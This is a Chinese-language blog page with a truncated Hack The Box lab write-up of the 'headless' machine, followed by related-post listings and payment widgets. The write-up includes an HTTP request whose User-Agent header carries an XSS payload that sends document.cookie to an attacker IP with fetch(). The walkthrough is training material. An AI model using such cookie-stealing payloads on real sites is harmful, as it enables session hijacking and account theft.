HTB靶机渗透之headless(linux-easy)_headless htb,网络安全开发必须掌握

最新推荐文章于 2024-05-27 21:06:21 发布
最新推荐文章于 2024-05-27 21:06:21 发布
阅读量906 收藏 21
点赞数 18
分类专栏: 2024年程序员学习 文章标签: linux web安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60608008/article/details/137353349
版权

1.SSTI注入(flask)

2.sql注入(表单)

3.xss(表单+网站场景)

遂一个一个尝试,于是打开burp随便输入了一个SSTI的%a0截断

image-20240328232041419

爆出了一个waf页面,提示这个browser information会被发送给管理员,哦豁,好像xss的可能性增加了(就是xss)

另外dashboard提示如下:

image-20240329000051503

说明我们没有权限,这更加确定了xss的方向

二、获得立足点

所以我们在浏览器的基本信息里插入xss看看会不会成功吧,这里选择user-agent字段

于是有以下数据包:

POST /support HTTP/1.1
Host: 10.10.11.8:5000
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.8:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: <img src=15m0 οnerrοr=fetch(“http://10.10.16.62:8666/?cookie=”+document.cookie);>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.8:5000/support
Accept-Encoding: gzip, deflate, br
Accep

最低0.47元/天 解锁文章
不爱敲代码的小龙
关注
  • 18
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
HTB-Agile
TA不懒,但还没有添加简介
05-22 898
HTB-Agile
hack the box(HTB) 的headless详细新手0基础wp
weixin_51439723的博客
04-13 249
①拿到ip后先用nmap看开放的端口可以看到5000端口有http信息比较可疑,直接用dirsearch扫一下:其中中support是试图直接在这里获得信息但是没什么回显另一个进不去,/dashboard显示那么很有可能是需要拿到授权才能进来这个页面现在我们把关注点在再放到/support上。
HTB靶机渗透headless(linux-easy)
m0_60351808的博客
03-29 1315
这个靶机难度还行,只是攻击方式很新颖,以前没接触过,一时不知道如何下手,功力还有所欠缺啊!
HTB靶机渗透headless(linux-easy)_headless htb(1)
2401_83620841的博客
04-28 857
靶机linux ip:10.10.11.8攻击机:linux ip:10.10.16.62首先nmap进行基本的端口扫描执行命令后等待了很久有了如下结果结果很长,总结一下:开放了22和5000端口,22端口自然是openssh,但5000端口这个协议不常见啊,查了一下upnp协议好像是在路由器上运行的服务,不过跑出了http协议,浏览器访问一下同时dirsearch跑一跑爆出了/dashboard目录显示是一个正在建设的网站,底下有一个提交问题的按钮,看看内容。
2024年最新HTB靶机渗透headless(linux-easy)_headless htb(1),硬核
2401_84140060的博客
05-09 316
为了做好运维面试路上的助攻手,特整理了上百道,让你面试不慌心不跳,高薪offer怀里抱!这次整理的面试题,本份面试集锦涵盖了1、什么是运维?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?3、现在给你三百台服务器,你怎么对他们进行管理?4、简述raid0 raid1raid5二种工作模式的工作原理及特点5、LVS、Nginx、HAproxy有什么区别?工作中你怎么选择?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?
HTB靶机渗透headless(linux-easy)_headless htb网络安全通用流行框架大全
m0_61331491的博客
04-05 766
SF:\x20\x20\x20background-color:\x20#fff;\n\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20border-radius:\x2010px;\n\x20\x20\x20\x20\x20\x20\x20 SF:x20\x20\x20\x20\x20box-shadow:\x200px\x200px\x2020px\x20rgba(0,\x200, SF:x200,\x200.2);\n\x20\x20\x20\x2
2024年最新HTB靶机渗透headless(linux-easy)_headless htb(1),2024年最新斗鱼Linux运维开发二面被刷
m0_61943758的博客
05-04 912
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以点击这里获取!一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!执行命令后等待了很久有了如下结果 结果很长,总结一下:开放了22和5000端口,22端口自然是openssh,但5000端口这个协议不常见啊,查了一下upnp协
HTB靶机渗透headless(linux-easy)_headless htb
m0_61409163的博客
04-07 398
以上网络安全知识点,真正体系化!**
enum4linux-ng:enum4linux的下一代版本(WindowsSamba枚举工具),具有JSONYAML导出等附加功能。 针对安全专业人员和CTF玩家
02-05
ng enum4linux的下一代版本 enum4linux-ng.py是Mark Lowe(以前的Portcullis Labs,现为Cisco CX Security Labs)enum4linux.pl的改写,enum4linux.pl是用于枚举Windows和Samba系统中信息的工具,面向安全专业人员和...
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
python库,解压后可用。 资源全名:htb_cli-0.1.1-py3-none-any.whl
HTB打靶日记:Stocker
01-15
hackthebox
write-ups:来自CTF和HTB演练的文章
03-21
写作 :triangular_flag: CTF和Hackthebox演练撰写文章 目录
Linux最新HTB靶机渗透headless(linux-easy)_headless htb(2),2024阿里Linux运维高级面试题总结
2401_83947255的博客
05-10 939
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
Linux - 磁盘的分区和挂载
最新发布
weixin_45735487的博客
05-27 753
逻辑分区只能在拓展分区上划分,编号5-15。拓展分区编号1-4,拓展分区不能格式化。rescue 恢复分区,对于误删的分区进行恢复,语法: rescue 起始 结束。rm 删除分区,后接要删除的分区编号。(L) 在主分区和拓展分区划分完之后,默认提示划分逻辑分区。n 进行磁盘分区,这里会默认MBR标签。(p) msdos下,会默认选择先划分主分区。
Linux】升级GCC(版本9.3),补充:binutils
yannan20190313的博客
05-27 806
Linux】升级GCC(版本9.3),补充:binutils
Linux】中常见的重要指令(下)以及重要的几个热键
2401_84568462的博客
05-27 1192
find指令查找的文件不能当前路径下(可以这样理解:如果要查找当前路径下可以使用ls指令,就不麻烦find指令了),必须查找当前路径下的目录里的文件。1.能被打包压缩的一定是由多个文件组成的,打包压缩后将文件变为一个整体,在传递给其他用户时不容易缺失。.tar打包后缀 .gz压缩后缀 XXX.tar.gz ----->XXX.tgz。功能:在系统特定的路径下查找,及可以找到可执行程序,有可以找到手册,安装包和压缩包等。命令在目录结构中搜索文件,并执行指定的操作。功能:在指令路径下搜索指令文件。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值